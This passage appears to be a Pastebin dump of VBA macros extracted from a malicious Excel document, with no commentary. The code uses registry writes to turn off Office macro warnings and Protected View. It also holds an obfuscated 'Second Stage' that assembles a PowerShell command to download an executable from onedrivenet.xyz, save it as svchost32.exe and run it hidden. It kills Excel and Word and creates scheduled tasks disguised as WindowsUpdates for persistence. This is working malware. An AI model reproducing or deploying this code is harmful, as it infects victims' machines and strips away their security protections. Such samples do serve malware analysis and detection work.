  397. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  398. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  399. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  400. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  401. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  402. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  403. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  404. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  405. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  406. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  407. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  408. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  409. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  410. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  411. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  412. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  413. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  414. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  415. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  416. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  417. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  418. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  419. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  420. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  421. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  422. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  423. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  424. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  425. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  426. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  427. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  428. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  429. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  430. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  431. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  432. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  433. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  434. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  435. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  436. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  437. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  438. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  439. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  440. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  441. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  442. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  443. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  444. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  445. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  446. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  447.  
  448.  
  449.  
  450. End Sub
  451.  
  452.  
  453. -------------------------------------------------------------------------------
  454. VBA MACRO Sheet1.cls
  455. in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
  456. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  457. (empty macro)
  458. -------------------------------------------------------------------------------
  459. VBA MACRO Module1.bas
  460. in file: xl/vbaProject.bin - OLE stream: 'VBA/Module1'
  461. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  462. Sub duckyou()
  463.  
  464. End Sub
  465.  
  466.  
  467.  
  468.  
  469. '################################### Second Stage ####################################
  470. set AlWhaWu8AmxahJAs = CreateObject("WScript.Shell")
  471.    Dim Al89AwnAmxahJAs1
  472.    Dim Al89AwnAmxahJAs2
  473.    Dim Al89AwnAmxahJAs3
  474.    Dim Al89AwnAmxahJAs4
  475.    Dim Al89AwnAmxahJAs5
  476.    Dim Al89AwnAmxahJAs6
  477.    Dim Al89AwnAmxahJAs7
  478.    Dim Al89AwnAmxahJAs8
  479.    Dim Al89AwnAmxahJAs9
  480.    Dim Al89AwnAmxahJAs010
  481.    Dim Al89AwnAmxahJAs011
  482.    Dim Al89AwnAmxahJAs012
  483.    Dim Al89AwnAmxahJAs013
  484.    Dim Al89AwnAmxahJAs014
  485.  
  486.  
  487.    
  488. Al89AwnAmxahJAs1 = "PowerShel"
  489. Al89AwnAmxahJAs2 = "l (New-Ob"
  490. Al89AwnAmxahJAs3 = "ject Syst"
  491. Al89AwnAmxahJAs4 = "em.Net.We"
  492. Al89AwnAmxahJAs5 = "bClient)."
  493. Al89AwnAmxahJAs6 = "DownloadF"
  494. Al89AwnAmxahJAs7 = "ile('http://onedrivenet.xyz/work/exe/20.exe',"
  495. Al89AwnAmxahJAs8 = "'%Public%\s"
  496. Al89AwnAmxahJAs9 = "vchost32."
  497. Al89AwnAmxahJAs010 = "exe');S"
  498. Al89AwnAmxahJAs011 = "tart-Pr"
  499. Al89AwnAmxahJAs012 = "ocess '%"
  500. Al89AwnAmxahJAs013 = "Public%\sv"
  501. Al89AwnAmxahJAs014 = "chost32.exe'"
  502.  
  503.  
  504.    
  505. Al89AwnAmxahJAs20 = Al89AwnAmxahJAs1 + Al89AwnAmxahJAs2 + Al89AwnAmxahJAs3 + Al89AwnAmxahJAs4 + Al89AwnAmxahJAs5 + Al89AwnAmxahJAs6 + Al89AwnAmxahJAs7 + Al89AwnAmxahJAs8 + Al89AwnAmxahJAs9 + Al89AwnAmxahJAs010 + Al89AwnAmxahJAs011 + Al89AwnAmxahJAs012 + Al89AwnAmxahJAs013 + Al89AwnAmxahJAs014
  506.  
  507.  
  508.     AlWhaWu8AmxahJAs.run Al89AwnAmxahJAs20, vbHide
  509.  
  510. set tskkill = CreateObject("WScript.Shell")
  511.    Dim STArTkwZkill
  512.     STArTkwZkill = "Powershell -WindowStyle Hidden taskkill /f /im Excel.exe"
  513.  
  514. tskkill.run STArTkwZkill, vbHide
  515.  
  516.  
  517.  
  518. set Machuda2 = CreateObject("WScript.Shell")
  519.    Dim STArTkwZtime
  520.     STArTkwZtime = "SchTasks /Create /sc MINUTE /MO 200 /TN WindowsUpdates /TR C:\\Users\\Public\\svchost32.vbs /F"
  521.  
  522. Machuda2.run STArTkwZtime, vbHide
  523.  
  524.  
  525. set Machuda22 = CreateObject("WScript.Shell")
  526.    Dim STArTkwZ2time
  527.     STArTkwZ2time = "SchTasks /Create /sc MINUTE /MO 200 /TN WindowsUpdates2 /TR C:\\Users\\Public\\svchost325.vbs /F"
  528.  
  529. Machuda22.run STArTkwZ2time, vbHide
  530.  
  531.  
  532.  
  533. set HOalwu = CreateObject("WScript.Shell")
  534.    Dim AmwQ2
  535.     AmwQ2 = "schtasks /delete /tn WindowsUpdate /F"
  536.  
  537.  
  538. HOalwu.run AmwQ2, vbHide
  539.  
  540.  
  541.  
  542. Set wso = CreateObject("WScript.Shell")
  543. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  544. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  545. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  546. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  547. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  548. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  549. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  550. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  551. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  552. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  553. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  554. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  555. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  556. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  557. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  558. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  559. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  560. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  561. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  562. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  563. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  564. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  565. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  566. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  567. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  568. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  569. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  570. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  571. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  572. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  573. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  574. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  575. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  576. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  577. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  578. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  579. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  580. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  581. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  582. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  583. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  584. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  585. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  586. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  587. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  588. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  589. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  590. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  591. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  592. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  593. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  594. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  595. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  596. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  597. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  598. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  599. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  600. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  601. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  602. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  603.  
  604. set tskkillword = CreateObject("WScript.Shell")
  605.    Dim STArTkwZkillword
  606.     STArTkwZkillword = "Powershell -WindowStyle Hidden taskkill /f /im winword.exe"
  607.  
  608. tskkillword.run STArTkwZkillword, vbHide
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!